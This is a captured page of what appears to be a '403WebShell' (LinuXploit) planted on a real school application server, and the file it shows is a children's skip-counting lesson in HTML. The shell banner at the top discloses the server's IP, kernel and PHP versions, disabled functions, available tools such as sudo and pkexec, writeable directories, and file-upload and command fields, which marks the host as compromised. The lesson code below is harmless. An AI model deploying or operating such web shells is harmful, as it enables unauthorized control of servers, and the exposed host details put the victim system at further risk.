????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.133.59.209
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old3/Html/LevelC/Category2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old3/Html/LevelC/Category2/LevelCCat2Lesson3.html
<!DOCTYPE html>
<html>
    <head>
        <title>Write numbers on the frogs</title>
        
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
            
            <style type="text/css">
            
                #id_txtSet1_box1, #id_txtSet1_box2, #id_txtSet1_box3, #id_txtSet1_box4, #id_txtSet1_box5, #id_txtSet1_box6, #id_txtSet2_box1, #id_txtSet2_box2, #id_txtSet2_box3, #id_txtSet2_box4, #id_txtSet2_box5, #id_txtSet3_box1, #id_txtSet3_box2, #id_txtSet3_box3, #id_txtSet3_box4, #id_txtSet3_box5, #id_txtSet4_box1, #id_txtSet4_box2, #id_txtSet4_box3, #id_txtSet4_box4, #id_txtSet4_box5, #id_txtSet4_box6
                {
                    position: absolute;
                    width: 3%;
                    text-align:center;
                    background-color: black;
                }
            </style>
            
            <script>
                
                function page_preLoad()
                {
                    shared_setDeviceTypeLevelCategoryLastLesson(Level.C, Category.No2);
                    shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                    
                    shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.C, Category.No2, 3), true, true);
                    shared_setFooterTable('id_tblFooter', true, true, true, true, true);
                    
                    var ids_headings = ['id_td_heading1', 'id_td_heading2', 'id_td_heading3', 'id_td_heading4'];
                    
                    var idStartSuffix = 1;
                    var idEndSuffix = 31;
                    var id;
                    var ids_textFields = new Array();
                    
                    //Set1
                    for (var id_textFieldSuffix = 1; id_textFieldSuffix <= 6; id_textFieldSuffix++)
                    {
                        ids_textFields.push('id_txtSet1_box' + id_textFieldSuffix);
                    }
                    
                    //Set2
                    for (var id_textFieldSuffix = 1; id_textFieldSuffix <= 5; id_textFieldSuffix++)
                    {
                        ids_textFields.push('id_txtSet2_box' + id_textFieldSuffix);
                    }
                    
                    //Set3
                    for (var id_textFieldSuffix = 1; id_textFieldSuffix <= 5; id_textFieldSuffix++)
                    {
                        ids_textFields.push('id_txtSet3_box' + id_textFieldSuffix);
                    }
                    
                    //Set4
                    for (var id_textFieldSuffix = 1; id_textFieldSuffix <= 6; id_textFieldSuffix++)
                    {
                        ids_textFields.push('id_txtSet4_box' + id_textFieldSuffix);
                    }
                    
                    shared_adjust_fontSize_for_ids_all_devices(ids_headings, 70);                    
                    shared_adjust_fontSize_for_ids_all_devices(ids_textFields, 60);
                    
                    setAllTextFieldsPosition();
                }
            
                function page_onLoad()
                {
                    
                }
            
                function btnPrevious_click()
                {
                    window.location = 'LevelCCat2Lesson2.html';
                }
                
                function btnNext_click()
                {
                    window.location = 'LevelCCat2Lesson4.html';
                }
                
                function btnHome_click()
                {
                    shared_btnHomeCategories_click('LevelC');
                }
            
                function setAllTextFieldsPosition()
                {
                    //Set1
                    for (var id_textFieldSuffix = 1; id_textFieldSuffix <= 6; id_textFieldSuffix++)
                    {
                        setTextFieldPosition('id_tdSet1_td' + id_textFieldSuffix, 'id_txtSet1_box' + id_textFieldSuffix, 1);
                    }
                    
                    //Set2
                    for (var id_textFieldSuffix = 1; id_textFieldSuffix <= 5; id_textFieldSuffix++)
                    {
                        setTextFieldPosition('id_tdSet2_td' + id_textFieldSuffix, 'id_txtSet2_box' + id_textFieldSuffix, 2);
                    }
                    
                    //Set3
                    for (var id_textFieldSuffix = 1; id_textFieldSuffix <= 5; id_textFieldSuffix++)
                    {
                        setTextFieldPosition('id_tdSet3_td' + id_textFieldSuffix, 'id_txtSet3_box' + id_textFieldSuffix, 3);
                    }
                    
                    //Set4
                    for (var id_textFieldSuffix = 1; id_textFieldSuffix <= 6; id_textFieldSuffix++)
                    {
                        setTextFieldPosition('id_tdSet4_td' + id_textFieldSuffix, 'id_txtSet4_box' + id_textFieldSuffix, 4);
                    }
                }
            
                function setTextFieldPosition(id_td, id_textField, setNo)
                {
                    var eTd = document.getElementById(id_td);
                    var eTdRectangle = eTd.getBoundingClientRect();
                    
                    var eTextField = document.getElementById(id_textField);
                    
                    var leftEdition = (setNo == 2 || setNo == 3) ? (eTdRectangle.width * 0.35) : (eTdRectangle.width * 0.32);
                    
                    eTextField.style.left = eTdRectangle.left + leftEdition + 'px';
                    eTextField.style.top = eTdRectangle.top + (eTdRectangle.height * 0.46) +  'px';
                    
                    //Newly added
                    if (shared_currentDeviceOS == shared_deviceOS_iOS)
                    {
                        eTextField.style.width = '3.4%';
                        eTextField.style.height = '2.8%';
                    }
                    else if (shared_currentDeviceOS == shared_deviceOS_Android)
                    {
                        eTextField.style.width = '6%';
                        eTextField.style.height = '3%';
                    }
                    else if (shared_currentDeviceOS == shared_DeviceOS_WebOS)
                    {
                        eTextField.style.width = (setNo == 2 || setNo == 3) ? (eTdRectangle.width * 0.27) + 'px' : (eTdRectangle.width * 0.31) + 'px';
                        eTextField.style.height = (setNo == 2 || setNo == 3) ? (eTdRectangle.width * 0.20)  + 'px': (eTdRectangle.width * 0.23) + 'px';
                    }
                    else if (shared_currentDeviceOS == shared_DeviceOS_OtherOS)
                    {
                        eTextField.style.width = '3.5%';
                        eTextField.style.height = '3.3%';
                    }
                }
            
                function isNumberKey(event, id_textField)
                {
                    if (event.keyCode >= 48 && event.keyCode <= 57)
                    {
                        var eTextField = document.getElementById(id_textField);
                        
                        if (eTextField.value.length >= 2)
                        {
                            return (false);
                        }
                        
                        return (true);
                    }
                    
                    return (false);
                }
                
                function btnValidate_click()
                {
                    var nWrongs = 0;
                    
                    //Set1
                    for (var id_textFieldSuffix = 1; id_textFieldSuffix <= 6; id_textFieldSuffix++)
                    {
                        var eTextField = document.getElementById('id_txtSet1_box' + id_textFieldSuffix);
                        
                        eTextField.style.backgroundColor = (eTextField.value == id_textFieldSuffix * 3) ? shared_colorGreen : shared_colorRed;
                        nWrongs += (eTextField.value == id_textFieldSuffix * 3) ? 0 : 1;
                    }
                    
                    //Set2
                    for (var id_textFieldSuffix = 1; id_textFieldSuffix <= 5; id_textFieldSuffix++)
                    {
                        var eTextField = document.getElementById('id_txtSet2_box' + id_textFieldSuffix);
                        
                        eTextField.style.backgroundColor = (eTextField.value == id_textFieldSuffix * 4) ? shared_colorGreen : shared_colorRed;
                        nWrongs += (eTextField.value == id_textFieldSuffix * 4) ? 0 : 1;
                    }
                    
                    //Set3
                    for (var id_textFieldSuffix = 1; id_textFieldSuffix <= 5; id_textFieldSuffix++)
                    {
                        var eTextField = document.getElementById('id_txtSet3_box' + id_textFieldSuffix);
                        
                        eTextField.style.backgroundColor = (eTextField.value == id_textFieldSuffix * 5) ? shared_colorGreen : shared_colorRed;
                        nWrongs += (eTextField.value == id_textFieldSuffix * 5) ? 0 : 1;
                    }
                    
                    //Set4
                    for (var id_textFieldSuffix = 1; id_textFieldSuffix <= 6; id_textFieldSuffix++)
                    {
                        var eTextField = document.getElementById('id_txtSet4_box' + id_textFieldSuffix);
                        
                        eTextField.style.backgroundColor = (eTextField.value == id_textFieldSuffix * 6) ? shared_colorGreen : shared_colorRed;
                        nWrongs += (eTextField.value == id_textFieldSuffix * 6) ? 0 : 1;
                    }
                    
                    if (nWrongs == 0)
                    {
                        shared_show_claps_animation('shared_id_div_claps_image');
                    }
                }
        </script>
    </head>
    
    <body onLoad="page_onLoad()">
        <div id="shared_id_div_claps_image">
        </div>
        
        <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
            <tr height="8%">
                <td>
                    <div id="id_tblHeader"></div>
                </td>
            </tr>
            <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
                <td>
                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                        <tr>
                            <td>
                                <table width="100%" height="100%" border="0px" cellspacing="0" cellpadding="2%">
                                    <tr height="25%">
                                        <td align="center" style="padding-bottom: 0px">
                                            <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
                                                <tr height="20%">
                                                    <td id="id_td_heading1" class="shared_style_options_blue_24px_bold" style="border-bottom:none">1. Write numbers from 3 to 18 on the frogs by counting 3's:
                                                    </td>
                                                </tr>
                                                <tr>
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_tdSet1_td1" align="center" style="text-align:center">
                                                                    <span>
                                                                        <img id="id_imgSet1Frog1" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="70%" height="auto">
                                                                        <input type="number" id="id_txtSet1_box1" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet1_box1')">
                                                                    </span>
                                                                </td>
                                                                <td id="id_tdSet1_td2" align="center">
                                                                    <span>
                                                                        <img id="id_imgSet1Frog2" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="70%" height="auto">
                                                                        <input type="number" id="id_txtSet1_box2" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet1_box2')">
                                                                    </span>
                                                                </td>
                                                                <td id="id_tdSet1_td3" align="center">
                                                                    <span>
                                                                        <img id="id_imgSet1Frog3" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="70%" height="auto">
                                                                        <input type="number" id="id_txtSet1_box3" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet1_box3')">
                                                                    </span>
                                                                </td>
                                                                <td id="id_tdSet1_td4" align="center">
                                                                    <span>
                                                                        <img id="id_imgSet1Frog4" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="70%" height="auto">
                                                                        <input type="number" id="id_txtSet1_box4" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet1_box4')">
                                                                    </span>
                                                                </td>
                                                                <td id="id_tdSet1_td5" align="center">
                                                                    <span>
                                                                        <img id="id_imgSet1Frog5" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="70%" height="auto">
                                                                        <input type="number" id="id_txtSet1_box5" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet1_box5')">
                                                                    </span>
                                                                </td>
                                                                <td id="id_tdSet1_td6" align="center">
                                                                    <span>
                                                                        <img id="id_imgSet1Frog6" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="70%" height="auto">
                                                                        <input type="number" id="id_txtSet1_box6" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet1_box6')">
                                                                    </span>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr height="25%">
                                        <td align="center" style="padding-bottom: 0px">
                                            <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
                                                <tr height="20%">
                                                    <td id="id_td_heading2" class="shared_style_options_blue_24px_bold" style="border-bottom:none">2. Write numbers from 4 to 20 on the frogs by counting 4's:
                                                    </td>
                                                </tr>
                                                <tr>
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_tdSet2_td1" align="center" style="text-align:center">
                                                                    <span>
                                                                        <img id="id_imgSet2Frog1" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="60%" height="auto">
                                                                        <input type="number" id="id_txtSet2_box1" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet2_box1')">
                                                                    </span>
                                                                </td>
                                                                <td id="id_tdSet2_td2" align="center">
                                                                    <span>
                                                                        <img id="id_imgSet2Frog2" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="60%" height="auto">
                                                                        <input type="number" id="id_txtSet2_box2" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet2_box2')">
                                                                    </span>
                                                                </td>
                                                                <td id="id_tdSet2_td3" align="center">
                                                                    <span>
                                                                        <img id="id_imgSet2Frog3" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="60%" height="auto">
                                                                        <input type="number" id="id_txtSet2_box3" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet2_box3')">
                                                                    </span>
                                                                </td>
                                                                <td id="id_tdSet2_td4" align="center">
                                                                    <span>
                                                                        <img id="id_imgSet2Frog4" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="60%" height="auto">
                                                                        <input type="number" id="id_txtSet2_box4" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet2_box4')">
                                                                    </span>
                                                                </td>
                                                                <td id="id_tdSet2_td5" align="center">
                                                                    <span>
                                                                        <img id="id_imgSet2Frog5" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="60%" height="auto">
                                                                        <input type="number" id="id_txtSet2_box5" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet2_box5')">
                                                                    </span>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr height="25%">
                                        <td align="center" style="padding-bottom: 0px">
                                            <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
                                                <tr height="20%">
                                                    <td id="id_td_heading3" class="shared_style_options_blue_24px_bold" style="border-bottom:none">3. Write numbers from 5 to 25 on the frogs by counting 5's:
                                                    </td>
                                                </tr>
                                                <tr>
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_tdSet3_td1" align="center" style="text-align:center">
                                                                    <span>
                                                                        <img id="id_imgSet3Frog1" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="60%" height="auto">
                                                                        <input type="number" id="id_txtSet3_box1" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet3_box1')">
                                                                    </span>
                                                                </td>
                                                                <td id="id_tdSet3_td2" align="center">
                                                                    <span>
                                                                        <img id="id_imgSet3Frog2" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="60%" height="auto">
                                                                        <input type="number" id="id_txtSet3_box2" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet3_box2')">
                                                                    </span>
                                                                </td>
                                                                <td id="id_tdSet3_td3" align="center">
                                                                    <span>
                                                                        <img id="id_imgSet3Frog3" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="60%" height="auto">
                                                                        <input type="number" id="id_txtSet3_box3" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet3_box3')">
                                                                    </span>
                                                                </td>
                                                                <td id="id_tdSet3_td4" align="center">
                                                                    <span>
                                                                        <img id="id_imgSet3Frog4" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="60%" height="auto">
                                                                        <input type="number" id="id_txtSet3_box4" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet3_box4')">
                                                                    </span>
                                                                </td>
                                                                <td id="id_tdSet3_td5" align="center">
                                                                    <span>
                                                                        <img id="id_imgSet3Frog5" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="60%" height="auto">
                                                                        <input type="number" id="id_txtSet3_box5" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet3_box5')">
                                                                    </span>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr height="*">
                                        <td align="center">
                                            <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
                                                <tr height="20%">
                                                    <td id="id_td_heading4" class="shared_style_options_blue_24px_bold" style="border-bottom:none">4. Write numbers from 6 to 36 on the frogs by counting 6's:
                                                    </td>
                                                </tr>
                                                <tr>
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_tdSet4_td1" align="center" style="text-align:center">
                                                                    <span>
                                                                        <img id="id_imgSet4Frog1" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="70%" height="auto">
                                                                        <input type="number" id="id_txtSet4_box1" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet4_box1')">
                                                                    </span>
                                                                </td>
                                                                <td id="id_tdSet4_td2" align="center">
                                                                    <span>
                                                                        <img id="id_imgSet4Frog2"  src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="70%" height="auto">
                                                                        <input type="number" id="id_txtSet4_box2" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet4_box2')">
                                                                    </span>
                                                                </td>
                                                                <td id="id_tdSet4_td3" align="center">
                                                                    <span>
                                                                        <img id="id_imgSet4Frog3" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="70%" height="auto">
                                                                        <input type="number" id="id_txtSet4_box3" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet4_box3')">
                                                                    </span>
                                                                </td>
                                                                <td id="id_tdSet4_td4" align="center">
                                                                    <span>
                                                                        <img id="id_imgSet4Frog4" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="70%" height="auto">
                                                                        <input type="number" id="id_txtSet4_box4" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet4_box4')">
                                                                    </span>
                                                                </td>
                                                                <td id="id_tdSet4_td5" align="center">
                                                                    <span>
                                                                        <img id="id_imgSet4Frog5" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="70%" height="auto">
                                                                        <input type="number" id="id_txtSet4_box5" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet4_box5')">
                                                                    </span>
                                                                </td>
                                                                <td id="id_tdSet4_td6" align="center">
                                                                    <span>
                                                                        <img id="id_imgSet4Frog6" src="../../../img/LevelC/Category2/LevelCCat2Lesson3/frog.png" width="70%" height="auto">
                                                                        <input type="number" id="id_txtSet4_box6" class="shared_style_white_24px_bold" onkeypress="return isNumberKey(event, 'id_txtSet4_box6')">
                                                                    </span>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                        </tr>
                    </table>
                </td>
            </tr>
            <tr height="8%">
                <td>
                    <div id="id_tblFooter"></div>
                </td>
            </tr>
        </table>
        <script>
            page_preLoad();
        </script>
    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit